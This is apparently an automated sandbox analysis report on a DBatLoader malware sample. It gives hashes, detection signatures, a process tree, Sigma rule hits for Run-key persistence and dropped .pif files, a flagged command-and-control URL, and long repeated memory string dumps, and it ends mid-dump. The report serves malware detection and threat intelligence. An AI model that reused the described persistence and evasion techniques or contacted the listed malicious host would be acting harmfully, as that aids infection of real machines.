Edit tour

Windows Analysis Report
qDKTsL1y44.exe

Overview

General Information

Sample name:	qDKTsL1y44.exe renamed because original name is a hash value
Original sample name:	60e73c48b9559b07ba1aee9fe48e0185a2686e5b88407c590f60535ff36f85db.exe
Analysis ID:	1389143
MD5:	42f93ef4ac4943f328a1518bde3c333a
SHA1:	7bca2b97fe0136a6787a1f08903e723a7b2a17c1
SHA256:	60e73c48b9559b07ba1aee9fe48e0185a2686e5b88407c590f60535ff36f85db
Tags:	exe
Infos:

Detection

DBatLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected DBatLoader

Allocates memory in foreign processes

Drops PE files with a suspicious file extension

Found Tor onion address

Machine Learning detection for dropped file

Machine Learning detection for sample

Sample is not signed and drops a device driver

Sample uses process hollowing technique

Sigma detected: Execution from Suspicious Folder

Sigma detected: New RUN Key Pointing to Suspicious Folder

Sigma detected: Suspicious Program Location with Network Connections

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains functionality to call native functions

Contains functionality to check if a connection to the internet is available

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to detect sandboxes (mouse cursor move detection)

Contains functionality to dynamically determine API calls

Contains functionality to launch a process as a different user

Contains functionality to query locales information (e.g. system language)

Contains functionality to record screenshots

Contains functionality to retrieve information about pressed keystrokes

Creates a process in suspended mode (likely to inject code)

Creates driver files

Creates files inside the system directory

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Entry point lies outside standard sections

Extensive use of GetProcAddress (often used to hide API calls)

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

PE file contains an invalid checksum

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Execution of Suspicious File Type Extension

Tries to load missing DLLs

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Keylogger Generic

Classification

Process Tree

System is w10x64

qDKTsL1y44.exe (PID: 7304 cmdline: C:\Users\user\Desktop\qDKTsL1y44.exe MD5: 42F93EF4AC4943F328A1518BDE3C333A)

cmd.exe (PID: 7508 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\FinqiaevO.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7560 cmdline: cmd /c mkdir "\\?\C:\Windows " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

veaiqniF.pif (PID: 7604 cmdline: C:\Users\Public\Libraries\veaiqniF.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)

Finqiaev.PIF (PID: 7860 cmdline: "C:\Users\Public\Libraries\Finqiaev.PIF" MD5: 42F93EF4AC4943F328A1518BDE3C333A)

veaiqniF.pif (PID: 7952 cmdline: C:\Users\Public\Libraries\veaiqniF.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)

Finqiaev.PIF (PID: 8020 cmdline: "C:\Users\Public\Libraries\Finqiaev.PIF" MD5: 42F93EF4AC4943F328A1518BDE3C333A)

veaiqniF.pif (PID: 5264 cmdline: C:\Users\Public\Libraries\veaiqniF.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
DBatLoader	This Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.	No Attribution	https://blog.vincss.net/2020/09/re016-malware-analysis-modiloader-eng.html https://blog.vincss.net/re016-malware-analysis-modiloader/ https://gi7w0rm.medium.com/uncovering-ddgroup-a-long-time-threat-actor-d3b3020625a4 https://malcat.fr/blog/exploit-steganography-and-delphi-unpacking-dbatloader/ https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader	https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
00000000.00000003.1362814847.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
00000009.00000002.1632705294.0000000004141000.00000020.00001000.00020000.00000000.sdmp	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
Process Memory Space: qDKTsL1y44.exe PID: 7304	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.qDKTsL1y44.exe.41e0000.5.unpack	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security

Sigma Signatures

System Summary

Sigma detected: Execution from Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Users\Public\Libraries\veaiqniF.pif, CommandLine: C:\Users\Public\Libraries\veaiqniF.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\veaiqniF.pif, NewProcessName: C:\Users\Public\Libraries\veaiqniF.pif, OriginalFileName: C:\Users\Public\Libraries\veaiqniF.pif, ParentCommandLine: C:\Users\user\Desktop\qDKTsL1y44.exe, ParentImage: C:\Users\user\Desktop\qDKTsL1y44.exe, ParentProcessId: 7304, ParentProcessName: qDKTsL1y44.exe, ProcessCommandLine: C:\Users\Public\Libraries\veaiqniF.pif, ProcessId: 7604, ProcessName: veaiqniF.pif

Sigma detected: New RUN Key Pointing to Suspicious Folder

Source: Registry Key set

Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\Public\Finqiaev.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\qDKTsL1y44.exe, ProcessId: 7304, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Finqiaev

Sigma detected: Suspicious Program Location with Network Connections

Source: Network Connection

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: DestinationIp: 34.117.186.192, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Users\Public\Libraries\veaiqniF.pif, Initiated: true, ProcessId: 7604, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49708

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\Public\Finqiaev.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\qDKTsL1y44.exe, ProcessId: 7304, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Finqiaev

Sigma detected: Execution of Suspicious File Type Extension

Source: Process started

Author: Max Altgelt (Nextron Systems): Data: Command: C:\Users\Public\Libraries\veaiqniF.pif, CommandLine: C:\Users\Public\Libraries\veaiqniF.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\veaiqniF.pif, NewProcessName: C:\Users\Public\Libraries\veaiqniF.pif, OriginalFileName: C:\Users\Public\Libraries\veaiqniF.pif, ParentCommandLine: C:\Users\user\Desktop\qDKTsL1y44.exe, ParentImage: C:\Users\user\Desktop\qDKTsL1y44.exe, ParentProcessId: 7304, ParentProcessName: qDKTsL1y44.exe, ProcessCommandLine: C:\Users\Public\Libraries\veaiqniF.pif, ProcessId: 7604, ProcessName: veaiqniF.pif

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://severdops.ddns.net:2024

Avira URL Cloud: Label: malware

Multi AV Scanner detection for dropped file

Source: C:\Users\Public\Libraries\Finqiaev.PIF	ReversingLabs: Detection: 71%
Source: C:\Users\Public\Libraries\netutils.dll	ReversingLabs: Detection: 79%

Multi AV Scanner detection for submitted file

Source: qDKTsL1y44.exe

ReversingLabs: Detection: 71%

Machine Learning detection for dropped file

Source: C:\Users\Public\Libraries\netutils.dll	Joe Sandbox ML: detected
Source: C:\Users\Public\Libraries\Finqiaev.PIF	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: qDKTsL1y44.exe

Joe Sandbox ML: detected

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\Public\Libraries\veaiqniF.pif	Unpacked PE file: 7.2.veaiqniF.pif.400000.0.unpack
Source: C:\Users\Public\Libraries\veaiqniF.pif	Unpacked PE file: 10.2.veaiqniF.pif.400000.0.unpack
Source: C:\Users\Public\Libraries\veaiqniF.pif	Unpacked PE file: 12.2.veaiqniF.pif.400000.0.unpack

Source: qDKTsL1y44.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: unknown	HTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.8:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.8:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.8:49716 version: TLS 1.2

Source:	Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: qDKTsL1y44.exe, 00000000.00000003.1452714888.000000007FB80000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1529948732.00000000028FF000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1573191593.000000001B5C0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1445215113.000000007BBD0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1480406289.000000001B411000.00000004.00000020.00020000.00000000.sdmp, Finqiaev.PIF, 00000009.00000002.1651497472.000000007E649000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdb source: qDKTsL1y44.exe, 00000000.00000002.1529948732.00000000028FF000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1445215113.000000007BBD0000.00000004.00001000.00020000.00000000.sdmp, Finqiaev.PIF, 00000009.00000002.1651497472.000000007E649000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdbH source: qDKTsL1y44.exe, 00000000.00000002.1529948732.00000000028FF000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1445215113.000000007BBD0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1480406289.000000001B411000.00000004.00000020.00020000.00000000.sdmp, Finqiaev.PIF, 00000009.00000002.1651497472.000000007E649000.00000004.00001000.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\qDKTsL1y44.exe

Code function: 0_2_041E5C18 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,

0_2_041E5C18

Networking

Found Tor onion address

Source: qDKTsL1y44.exe, 00000000.00000002.1576058150.000000007A460000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: Gone<>idle1080DATAPINGopenStatJuneJuly as hourEESTSASTAKSTAKDTACSTACDTAESTAEDTAWSTCESTNZSTNZDT.com.exe.bat.cmdAhomChamKawiLisuMiaoModiNewaThaiToto3125Atoi-Inf+Infboolint8uintchanfunccallkind != allgallprootitabsbrk is LEAFbaseGOGCcas1cas2cas3cas4cas5cas6bitsNameTypeFromxn--cap -> failermssse3avx2bmi1bmi2asn1tag:(\d+)false<nil>Errorntohshostswriteclosefileshttpsimap2imap3imapspop3s:**@Rangeallowrange:path%s %q%s=%sHTTP/socksFound&"'chdirLstatMarchAprilmonthLocal+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930CountGreekAdlamBamumBatakBuhidDograKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilCall 1562578125int16int32int64uint8arrayslicedefersweepschedhchansudoggscanmheaptracepanicsleepgcingusagefault[...] (at Classtls: Earlyparseutf-8%s%dtext/bad nmatchrune SHA-1sse41sse42ssse3P-224P-256P-384P-521ECDSAStringFormat[]bytestringhangupkilledlistensocketnetdns.localreturn.onionip+netacceptdomaingophertelnetBasic CookiecookieexpectoriginserverclosedExpectstatusPragmasocks Lockedactivesocks5CANCELGOAWAYPADDEDremoveSundayMondayFridayAugustminutesecondUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13exec: CommonArabicBrahmiCarianChakmaCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiGetACPsendto390625uint16uint32uint64structchan<-<-chan Valuesysmontimersefenceselect, not object, val LengthheaderAnswerX25519%w%.0wAcceptServerempty rune1 rdtscppopcntcmd/goSTREETAppDataRoamingWindowsStartupJ2VALIDfloat32float64abortedCopySidWSARecvWSASendconnectsignal windowswsarecvwsasendlookup UpgradeReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGTrailer:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTHEADERSconsoleTuesdayJanuaryOctoberMUI_StdMUI_DltPATHEXT\\.\UNCAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaFreeSidSleepEx19531259765625invaliduintptrSwapperChanDir Value>ConvertforcegccpuprofunknowngctraceIO waitUNKNOWN:events::ffff:nil keyanswersderivedInitialExpiresSubjectcharsetInstAltInstNopalt -> nop -> any -> %v: %#xSHA-224SHA-256SHA-384SHA-512os/execruntime#internEd25519MD2-RSAMD5-RSAserial:2.5.4.62.5.4.32.5.4.52.5.4.72.5.4.82.5.4.9amsi.dllkernel324833C0C3ProgramsGoStringno anodeCancelIoReadFileAcceptExWSAIoctlshutdown[::1]:53continue_gatewayinvalid address readfromwsaioctlunixgramLocation data=%q incr=%v ping=%qif-matchlocationhttp/1.1HTTP/2.0HTTP/1.1no-cacheContinueAcceptedConflicthijackedNO_ERRORPRIORITYSETTINGSFullPathbad instThursdaySaturdayFebruaryNovemberDecember%!Month(_NewEnum%02d%02dArmenianBalineseBopomofoBugineseCherokeeCyrillicDuployanEthiopicGeorgianGujaratiGurmukhiHiraganaJavaneseKatakanaKayah_LiLinear_ALinear_BMahajaniOl_ChikiPhags_PaTagbanwaTai_ThamTai_VietTifinaghUgariticVithkuqiEqualSidSetEventIsWindowrecvfrom48828125strconv.parsing ParseIntscavengepollDescrwmutexWrwmutexRtraceBufdeadlockraceFinipanicnilcgocheck
Source: qDKTsL1y44.exe, 00000000.00000003.1487466514.0000000079F80000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: Gone<>idle1080DATAPINGopenStatJuneJuly as hourEESTSASTAKSTAKDTACSTACDTAESTAEDTAWSTCESTNZSTNZDT.com.exe.bat.cmdAhomChamKawiLisuMiaoModiNewaThaiToto3125Atoi-Inf+Infboolint8uintchanfunccallkind != allgallprootitabsbrk is LEAFbaseGOGCcas1cas2cas3cas4cas5cas6bitsNameTypeFromxn--cap -> failermssse3avx2bmi1bmi2asn1tag:(\d+)false<nil>Errorntohshostswriteclosefileshttpsimap2imap3imapspop3s:**@Rangeallowrange:path%s %q%s=%sHTTP/socksFound&"'chdirLstatMarchAprilmonthLocal+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930CountGreekAdlamBamumBatakBuhidDograKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilCall 1562578125int16int32int64uint8arrayslicedefersweepschedhchansudoggscanmheaptracepanicsleepgcingusagefault[...] (at Classtls: Earlyparseutf-8%s%dtext/bad nmatchrune SHA-1sse41sse42ssse3P-224P-256P-384P-521ECDSAStringFormat[]bytestringhangupkilledlistensocketnetdns.localreturn.onionip+netacceptdomaingophertelnetBasic CookiecookieexpectoriginserverclosedExpectstatusPragmasocks Lockedactivesocks5CANCELGOAWAYPADDEDremoveSundayMondayFridayAugustminutesecondUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13exec: CommonArabicBrahmiCarianChakmaCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiGetACPsendto390625uint16uint32uint64structchan<-<-chan Valuesysmontimersefenceselect, not object, val LengthheaderAnswerX25519%w%.0wAcceptServerempty rune1 rdtscppopcntcmd/goSTREETAppDataRoamingWindowsStartupJ2VALIDfloat32float64abortedCopySidWSARecvWSASendconnectsignal windowswsarecvwsasendlookup UpgradeReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGTrailer:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTHEADERSconsoleTuesdayJanuaryOctoberMUI_StdMUI_DltPATHEXT\\.\UNCAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaFreeSidSleepEx19531259765625invaliduintptrSwapperChanDir Value>ConvertforcegccpuprofunknowngctraceIO waitUNKNOWN:events::ffff:nil keyanswersderivedInitialExpiresSubjectcharsetInstAltInstNopalt -> nop -> any -> %v: %#xSHA-224SHA-256SHA-384SHA-512os/execruntime#internEd25519MD2-RSAMD5-RSAserial:2.5.4.62.5.4.32.5.4.52.5.4.72.5.4.82.5.4.9amsi.dllkernel324833C0C3ProgramsGoStringno anodeCancelIoReadFileAcceptExWSAIoctlshutdown[::1]:53continue_gatewayinvalid address readfromwsaioctlunixgramLocation data=%q incr=%v ping=%qif-matchlocationhttp/1.1HTTP/2.0HTTP/1.1no-cacheContinueAcceptedConflicthijackedNO_ERRORPRIORITYSETTINGSFullPathbad instThursdaySaturdayFebruaryNovemberDecember%!Month(_NewEnum%02d%02dArmenianBalineseBopomofoBugineseCherokeeCyrillicDuployanEthiopicGeorgianGujaratiGurmukhiHiraganaJavaneseKatakanaKayah_LiLinear_ALinear_BMahajaniOl_ChikiPhags_PaTagbanwaTai_ThamTai_VietTifinaghUgariticVithkuqiEqualSidSetEventIsWindowrecvfrom48828125strconv.parsing ParseIntscavengepollDescrwmutexWrwmutexRtraceBufdeadlockraceFinipanicnilcgocheck
Source: veaiqniF.pif, 00000007.00000002.1736658923.0000000000D90000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: Gone<>idle1080DATAPINGopenStatJuneJuly as hourEESTSASTAKSTAKDTACSTACDTAESTAEDTAWSTCESTNZSTNZDT.com.exe.bat.cmdAhomChamKawiLisuMiaoModiNewaThaiToto3125Atoi-Inf+Infboolint8uintchanfunccallkind != allgallprootitabsbrk is LEAFbaseGOGCcas1cas2cas3cas4cas5cas6bitsNameTypeFromxn--cap -> failermssse3avx2bmi1bmi2asn1tag:(\d+)false<nil>Errorntohshostswriteclosefileshttpsimap2imap3imapspop3s:**@Rangeallowrange:path%s %q%s=%sHTTP/socksFound&"'chdirLstatMarchAprilmonthLocal+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930CountGreekAdlamBamumBatakBuhidDograKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilCall 1562578125int16int32int64uint8arrayslicedefersweepschedhchansudoggscanmheaptracepanicsleepgcingusagefault[...] (at Classtls: Earlyparseutf-8%s%dtext/bad nmatchrune SHA-1sse41sse42ssse3P-224P-256P-384P-521ECDSAStringFormat[]bytestringhangupkilledlistensocketnetdns.localreturn.onionip+netacceptdomaingophertelnetBasic CookiecookieexpectoriginserverclosedExpectstatusPragmasocks Lockedactivesocks5CANCELGOAWAYPADDEDremoveSundayMondayFridayAugustminutesecondUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13exec: CommonArabicBrahmiCarianChakmaCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiGetACPsendto390625uint16uint32uint64structchan<-<-chan Valuesysmontimersefenceselect, not object, val LengthheaderAnswerX25519%w%.0wAcceptServerempty rune1 rdtscppopcntcmd/goSTREETAppDataRoamingWindowsStartupJ2VALIDfloat32float64abortedCopySidWSARecvWSASendconnectsignal windowswsarecvwsasendlookup UpgradeReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGTrailer:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTHEADERSconsoleTuesdayJanuaryOctoberMUI_StdMUI_DltPATHEXT\\.\UNCAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaFreeSidSleepEx19531259765625invaliduintptrSwapperChanDir Value>ConvertforcegccpuprofunknowngctraceIO waitUNKNOWN:events::ffff:nil keyanswersderivedInitialExpiresSubjectcharsetInstAltInstNopalt -> nop -> any -> %v: %#xSHA-224SHA-256SHA-384SHA-512os/execruntime#internEd25519MD2-RSAMD5-RSAserial:2.5.4.62.5.4.32.5.4.52.5.4.72.5.4.82.5.4.9amsi.dllkernel324833C0C3ProgramsGoStringno anodeCancelIoReadFileAcceptExWSAIoctlshutdown[::1]:53continue_gatewayinvalid address readfromwsaioctlunixgramLocation data=%q incr=%v ping=%qif-matchlocationhttp/1.1HTTP/2.0HTTP/1.1no-cacheContinueAcceptedConflicthijackedNO_ERRORPRIORITYSETTINGSFullPathbad instThursdaySaturdayFebruaryNovemberDecember%!Month(_NewEnum%02d%02dArmenianBalineseBopomofoBugineseCherokeeCyrillicDuployanEthiopicGeorgianGujaratiGurmukhiHiraganaJavaneseKatakanaKayah_LiLinear_ALinear_BMahajaniOl_ChikiPhags_PaTagbanwaTai_ThamTai_VietTifinaghUgariticVithkuqiEqualSidSetEventIsWindowrecvfrom48828125strconv.parsing ParseIntscavengepollDescrwmutexWrwmutexRtraceBufdeadlockraceFinipanicnilcgocheck
Source: veaiqniF.pif, 00000007.00000001.1488647701.0000000000400000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: Gone<>idle1080DATAPINGopenStatJuneJuly as hourEESTSASTAKSTAKDTACSTACDTAESTAEDTAWSTCESTNZSTNZDT.com.exe.bat.cmdAhomChamKawiLisuMiaoModiNewaThaiToto3125Atoi-Inf+Infboolint8uintchanfunccallkind != allgallprootitabsbrk is LEAFbaseGOGCcas1cas2cas3cas4cas5cas6bitsNameTypeFromxn--cap -> failermssse3avx2bmi1bmi2asn1tag:(\d+)false<nil>Errorntohshostswriteclosefileshttpsimap2imap3imapspop3s:**@Rangeallowrange:path%s %q%s=%sHTTP/socksFound&"'chdirLstatMarchAprilmonthLocal+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930CountGreekAdlamBamumBatakBuhidDograKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilCall 1562578125int16int32int64uint8arrayslicedefersweepschedhchansudoggscanmheaptracepanicsleepgcingusagefault[...] (at Classtls: Earlyparseutf-8%s%dtext/bad nmatchrune SHA-1sse41sse42ssse3P-224P-256P-384P-521ECDSAStringFormat[]bytestringhangupkilledlistensocketnetdns.localreturn.onionip+netacceptdomaingophertelnetBasic CookiecookieexpectoriginserverclosedExpectstatusPragmasocks Lockedactivesocks5CANCELGOAWAYPADDEDremoveSundayMondayFridayAugustminutesecondUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13exec: CommonArabicBrahmiCarianChakmaCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiGetACPsendto390625uint16uint32uint64structchan<-<-chan Valuesysmontimersefenceselect, not object, val LengthheaderAnswerX25519%w%.0wAcceptServerempty rune1 rdtscppopcntcmd/goSTREETAppDataRoamingWindowsStartupJ2VALIDfloat32float64abortedCopySidWSARecvWSASendconnectsignal windowswsarecvwsasendlookup UpgradeReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGTrailer:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTHEADERSconsoleTuesdayJanuaryOctoberMUI_StdMUI_DltPATHEXT\\.\UNCAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaFreeSidSleepEx19531259765625invaliduintptrSwapperChanDir Value>ConvertforcegccpuprofunknowngctraceIO waitUNKNOWN:events::ffff:nil keyanswersderivedInitialExpiresSubjectcharsetInstAltInstNopalt -> nop -> any -> %v: %#xSHA-224SHA-256SHA-384SHA-512os/execruntime#internEd25519MD2-RSAMD5-RSAserial:2.5.4.62.5.4.32.5.4.52.5.4.72.5.4.82.5.4.9amsi.dllkernel324833C0C3ProgramsGoStringno anodeCancelIoReadFileAcceptExWSAIoctlshutdown[::1]:53continue_gatewayinvalid address readfromwsaioctlunixgramLocation data=%q incr=%v ping=%qif-matchlocationhttp/1.1HTTP/2.0HTTP/1.1no-cacheContinueAcceptedConflicthijackedNO_ERRORPRIORITYSETTINGSFullPathbad instThursdaySaturdayFebruaryNovemberDecember%!Month(_NewEnum%02d%02dArmenianBalineseBopomofoBugineseCherokeeCyrillicDuployanEthiopicGeorgianGujaratiGurmukhiHiraganaJavaneseKatakanaKayah_LiLinear_ALinear_BMahajaniOl_ChikiPhags_PaTagbanwaTai_ThamTai_VietTifinaghUgariticVithkuqiEqualSidSetEventIsWindowrecvfrom48828125strconv.parsing ParseIntscavengepollDescrwmutexWrwmutexRtraceBufdeadlockraceFinipanicnilcgocheck
Source: veaiqniF.pif, 00000007.00000002.1736658923.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: Gone<>idle1080DATAPINGopenStatJuneJuly as hourEESTSASTAKSTAKDTACSTACDTAESTAEDTAWSTCESTNZSTNZDT.com.exe.bat.cmdAhomChamKawiLisuMiaoModiNewaThaiToto3125Atoi-Inf+Infboolint8uintchanfunccallkind != allgallprootitabsbrk is LEAFbaseGOGCcas1cas2cas3cas4cas5cas6bitsNameTypeFromxn--cap -> failermssse3avx2bmi1bmi2asn1tag:(\d+)false<nil>Errorntohshostswriteclosefileshttpsimap2imap3imapspop3s:**@Rangeallowrange:path%s %q%s=%sHTTP/socksFound&"'chdirLstatMarchAprilmonthLocal+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930CountGreekAdlamBamumBatakBuhidDograKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilCall 1562578125int16int32int64uint8arrayslicedefersweepschedhchansudoggscanmheaptracepanicsleepgcingusagefault[...] (at Classtls: Earlyparseutf-8%s%dtext/bad nmatchrune SHA-1sse41sse42ssse3P-224P-256P-384P-521ECDSAStringFormat[]bytestringhangupkilledlistensocketnetdns.localreturn.onionip+netacceptdomaingophertelnetBasic CookiecookieexpectoriginserverclosedExpectstatusPragmasocks Lockedactivesocks5CANCELGOAWAYPADDEDremoveSundayMondayFridayAugustminutesecondUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13exec: CommonArabicBrahmiCarianChakmaCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiGetACPsendto390625uint16uint32uint64structchan<-<-chan Valuesysmontimersefenceselect, not object, val LengthheaderAnswerX25519%w%.0wAcceptServerempty rune1 rdtscppopcntcmd/goSTREETAppDataRoamingWindowsStartupJ2VALIDfloat32float64abortedCopySidWSARecvWSASendconnectsignal windowswsarecvwsasendlookup UpgradeReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGTrailer:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTHEADERSconsoleTuesdayJanuaryOctoberMUI_StdMUI_DltPATHEXT\\.\UNCAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaFreeSidSleepEx19531259765625invaliduintptrSwapperChanDir Value>ConvertforcegccpuprofunknowngctraceIO waitUNKNOWN:events::ffff:nil keyanswersderivedInitialExpiresSubjectcharsetInstAltInstNopalt -> nop -> any -> %v: %#xSHA-224SHA-256SHA-384SHA-512os/execruntime#internEd25519MD2-RSAMD5-RSAserial:2.5.4.62.5.4.32.5.4.52.5.4.72.5.4.82.5.4.9amsi.dllkernel324833C0C3ProgramsGoStringno 